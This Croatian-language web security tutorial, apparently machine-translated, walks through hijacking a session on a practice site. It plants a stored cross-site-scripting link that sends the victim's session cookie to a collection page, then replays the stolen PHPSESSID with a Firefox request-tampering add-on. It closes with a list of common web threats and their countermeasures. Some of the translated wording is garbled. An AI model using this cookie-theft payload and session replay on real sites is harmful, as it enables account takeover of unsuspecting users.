Kako hakirati web stranicu? Tehnike hakiranja web stranice
โก Pametni saลพetak
Hakiranje web stranica iskoriลกtava slabosti u web aplikacijama - loลกe napisan kod, neprovjeren unos i slabo rukovanje sesijama - kako bi se dobio neovlaลกteni pristup. Ova stranica prikazuje uobiฤajene tehnike napada i, ลกto je joลก vaลพnije, protumjere koje odrลพavaju web stranicu sigurnom.

Viลกe ljudi ima pristup internetu nego ikad prije. To je potaknulo mnoge organizacije da razviju web aplikacije koje korisnici mogu koristiti online za interakciju s organizacijom. Loลกe napisan kod za web aplikacije moลพe se iskoristiti za dobivanje neovlaลกtenog pristupa osjetljivim podacima i web posluลพiteljima.
Nauฤit ฤete uobiฤajene tehnike hakiranja web stranica i protumjere koje ลกtite od takvih napada.
Kako hakirati web stranicu
U ovom praktiฤnom scenariju hakiranja web stranice, otet ฤemo korisniฤku sesiju web aplikacije koja se nalazi na www.techpanda.orgKoristit ฤemo cross-site scripting za ฤitanje ID-a sesije kolaฤiฤa, a zatim ga upotrijebiti za oponaลกanje legitimne korisniฤke sesije.
Pretpostavka je da napadaฤ ima pristup web aplikaciji i ลพeli oteti sesije drugih korisnika koji koriste istu aplikaciju. Cilj ovog napada mogao bi biti dobivanje administratorskog pristupa web aplikaciji, pod pretpostavkom da je napadaฤev pristupni raฤun ograniฤen.
Korak 1) Otvorite URL http://www.techpanda.org/.
Za praktiฤne svrhe, toplo se preporuฤuje pristup pomoฤu SQL injekcije. Pogledajte ovaj ฤlanak o SQL injekciji za viลกe informacija o tome kako to uฤiniti.
Korak 2) Unesite podatke za prijavu.
E-poลกta za prijavu je admin@google.com, a lozinka je Password2010.
Korak 3) Provjerite nadzornu ploฤu.
Ako ste se uspjeลกno prijavili, dobit ฤete sljedeฤu nadzornu ploฤu.
Korak 4) Unesite novi sadrลพaj.
Kliknite na Dodaj novi kontakt i unesite sljedeฤe kao ime:
<a href=# onclick=\"document.location=\'http://techpanda.org/snatch_sess_id.php?c=\'+escape\(document.cookie\)\;\">Dark</a>
Korak 5) Dodajte JavaSkripta.
Gornji kod koristi JavaSkripta. Dodaje hipervezu s dogaฤajem onclick. Kada niลกta ne sluteฤi korisnik klikne na vezu, dogaฤaj dohvaฤa ID sesije PHP kolaฤiฤa i ลกalje ga na stranicu snatch_sess_id.php zajedno s ID-om sesije u URL.
Korak 6) Dodajte detalje.
Unesite preostale podatke kao ลกto je prikazano dolje i kliknite Spremi promjene.
Korak 7) Provjerite nadzornu ploฤu.
Vaลกa nadzorna ploฤa sada ฤe izgledati kao na sljedeฤem zaslonu.
Korak 8) Provjerite ID sesije.
Buduฤi da je cross-site skripta pohranjena u bazi podataka, ona se uฤitava svaki put kada se korisnici s pravima pristupa prijave. Kada se administrator prijavi i klikne na hipervezu s natpisom Dark, prikazuje se prozor s ID-om sesije prikazanim u URL.
Napomena: skripta bi mogla poslati vrijednost udaljenom posluลพitelju na kojem je pohranjen PHPSESSID, a zatim preusmjeriti korisnika natrag kao da se niลกta nije dogodilo.
Napomena: vrijednost koju dobijete moลพe se razlikovati od one prikazane ovdje, ali koncept je isti.
Upotreba oponaลกanja sesije Firefox i Tamper Data dodatak
Napomena: klasiฤni dodatak Tamper Data prikazan u nastavku viลกe se ne instalira na trenutni Firefox, ali koncept koji ilustrira - presretanje i mijenjanje HTTP zahtjeva za ponovno reproduciranje snimljene sesije - ostaje nepromijenjen.
Dijagram toka u nastavku prikazuje korake koje morate poduzeti da biste dovrลกili ovu vjeลพbu.
- Trebat ฤe vam Firefox web preglednik za ovaj odjeljak i dodatak Tamper Data.
- Otvoren Firefox i instalirajte dodatak kao ลกto je prikazano na dijagramima ispod.
- Potraลพite podatke o neovlaลกtenom pristupu, a zatim kliknite na instalaciju kao ลกto je prikazano gore.
- Kliknite na Prihvati i instalirajโฆ
- Kliknite na Ponovno pokreni sada kada instalacija zavrลกi.
- Omoguฤite traku izbornika Firefox ako nije prikazano.
- Kliknite na izbornik Alati, a zatim odaberite Podaci o neovlaลกtenom mijenjanju kao ลกto je prikazano dolje.
- Dobit ฤete sljedeฤi prozor. Napomena: Ako prozor nije prazan, pritisnite gumb za brisanje.
- Kliknite na izbornik Pokreni neovlaลกteno mijenjanje.
- Prebacite se natrag na Firefox U web preglednik upiลกite http://www.techpanda.org/dashboard.php, a zatim pritisnite tipku Enter za uฤitavanje stranice.
- Dobit ฤete sljedeฤi skoฤni prozor od Tamper Data.
- Skoฤni prozor ima tri (3) opcije. Opcija Izmjena omoguฤuje vam izmjenu podataka HTTP zaglavlja prije nego ลกto se poลกalju posluลพitelju.
- Kliknite na nju.
- Dobit ฤete sljedeฤi prozor.
- Kopirajte ID PHP sesije koji ste kopirali iz napada URL i zalijepite ga nakon znaka jednakosti. Vaลกa vrijednost bi sada trebala izgledati ovako.
PHPSESSID=2DVLTIPP2N8LDBN11B2RA76LM2
- Kliknite na gumb OK.
- Ponovno ฤete dobiti skoฤni prozor s podacima o neovlaลกtenom mijenjanju.
- Poniลกtite potvrdni okvir koji pita Continue Tampering?
- Kliknite na gumb za slanje kada zavrลกite.
- Trebali biste moฤi vidjeti nadzornu ploฤu kao ลกto je prikazano dolje.
Napomena: nismo se prijavili; oponaลกali smo sesiju prijave koristeฤi PHPSESSID vrijednost koju smo preuzeli koriลกtenjem cross-site scriptinga.
ล to je web aplikacija? ล to su web prijetnje?
Web aplikacija (poznata i kao web stranica) je aplikacija temeljena na klijent-posluลพitelj modelu. Posluลพitelj omoguฤuje pristup bazi podataka i poslovnu logiku. Nalazi se na web posluลพitelju. Klijentska aplikacija radi na klijentskom web pregledniku. Web aplikacije su obiฤno napisane u jezicima kao ลกto su Java, C#, VB.Net, PHPi ColdFusion Markup Language, itd. Baze podataka koje se koriste u web aplikacijama ukljuฤuju MySQL, MS SQL Server, PostgreSQL, SQLite, Itd
Vrhunske tehnike hakiranja web stranica
Veฤina web aplikacija nalazi se na javnim posluลพitelji dostupni putem interneta. To ih ฤini ranjivima na napade zbog lake dostupnosti. Slijede uobiฤajene prijetnje web aplikacijama.
- SQL Injection โ cilj ove prijetnje mogao bi biti zaobilaลพenje algoritama za prijavu, sabotiranje podataka itd.
- Denial of Service Napadi โ cilj ove prijetnje mogao bi biti uskratiti legitimnim korisnicima pristup resursu.
- Skripta na viลกe stranica (XSS) โ cilj ove prijetnje mogao bi biti ubrizgavanje koda koji se moลพe izvrลกiti u pregledniku na strani klijenta.
- Trovanje kolaฤiฤima/sesijom โ cilj ove prijetnje je izmijeniti kolaฤiฤe/podatke o sesiji od strane napadaฤa kako bi dobio neovlaลกteni pristup.
- Neovlaลกteno mijenjanje obrasca โ cilj ove prijetnje je modificiranje podataka obrazaca kao ลกto su cijene u aplikacijama za e-trgovinu kako bi napadaฤ mogao dobiti artikle po sniลพenim cijenama.
- Code Ubrizgavanje โ cilj ove prijetnje je ubacivanje koda kao ลกto je PHP, Python, itd. koji se mogu izvrลกiti na posluลพitelju. Kod moลพe instalirati straลพnja vrata, otkriti osjetljive informacije itd.
- Oskvrnjivanje โ cilj ove prijetnje je izmijeniti stranicu koja se prikazuje na web mjestu i preusmjeriti sve zahtjeve za stranicu na jednu stranicu koja sadrลพi poruku napadaฤa.
Kako zaลกtititi svoju web stranicu od hakova?
Organizacija moลพe usvojiti sljedeฤu politiku kako bi se zaลกtitila od napada web posluลพitelja.
- SQL Injection โ ฤiลกฤenje i validacija korisniฤkih parametara prije slanja u bazu podataka na obradu moลพe pomoฤi u smanjenju vjerojatnosti napada putem SQL injekcije. Mehanizmi baza podataka kao ลกto je MS SQL Server, MySQLitd. podrลพavaju parametre i pripremljene naredbe. Mnogo su sigurniji od tradicionalnih SQL naredbi.
- Odbijanje napada usluga โ Vatrozidi se mogu koristiti za odbacivanje prometa sa sumnjivih IP adresa ako je napad jednostavan DoS. Pravilna konfiguracija mreลพa i sustav za otkrivanje upada takoฤer mogu pomoฤi u smanjenju vjerojatnosti uspjeha DoS napada.
- Skriptiranje na viลกe mjesta โ validiranje i ฤiลกฤenje zaglavlja, parametara proslijeฤenih putem URL, parametri obrasca i skrivene vrijednosti mogu pomoฤi u smanjenju XSS napada.
- Trovanje kolaฤiฤima/sesijom โ to se moลพe sprijeฤiti ลกifriranjem sadrลพaja kolaฤiฤa, vremenskim ograniฤenjem kolaฤiฤa nakon nekog vremena i povezivanjem kolaฤiฤa s IP adresom klijenta koja je koriลกtena za njihovo stvaranje.
- Neovlaลกteno mijenjanje obrasca โ to se moลพe sprijeฤiti validacijom i provjerom korisniฤkog unosa prije njegove obrade.
- Code Ubrizgavanje โ to se moลพe sprijeฤiti tretiranjem svih parametara kao podataka, a ne kao izvrลกnog koda. Za implementaciju ovoga mogu se koristiti sanitizacija i validacija.
- Oskvrnjivanje โ dobar sigurnost web aplikacije Pravila bi trebala osigurati da se zapeฤate ฤesto koriลกtene ranjivosti za pristup web posluลพitelju. To moลพe biti pravilna konfiguracija operativnog sustava, softvera web posluลพitelja i najboljih sigurnosnih praksi prilikom razvoja.ping web aplikacije.
Provjeri ovo: 9 najbolji URL Skeneri za provjeru je li poveznica sigurna od zlonamjernog softvera


















